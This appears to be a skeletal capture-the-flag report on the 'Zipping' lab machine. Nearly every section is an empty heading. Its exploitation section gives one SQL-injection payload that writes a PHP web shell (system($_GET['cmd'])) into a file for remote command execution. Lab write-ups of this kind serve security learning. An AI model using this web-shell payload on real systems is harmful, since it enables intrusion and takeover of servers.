Home Zipping Report
Post
Cancel

Zipping Report

Information gathering



Scope: 10.10.11.229/32 (Linux)

TCP Nmap scan: 65,535 ports

Vulnerability Assesment



Exploitation



  • rektsu RCE
    • Payload: %0a’;select ‘<?php system($_GET[“cmd”]); ?>’ into outfile ‘/var/lib/mysql/rce_poc.php’;#1

Post-exploitation



Lateral movement



Proof of concept



This post is licensed under CC BY 4.0 by the author.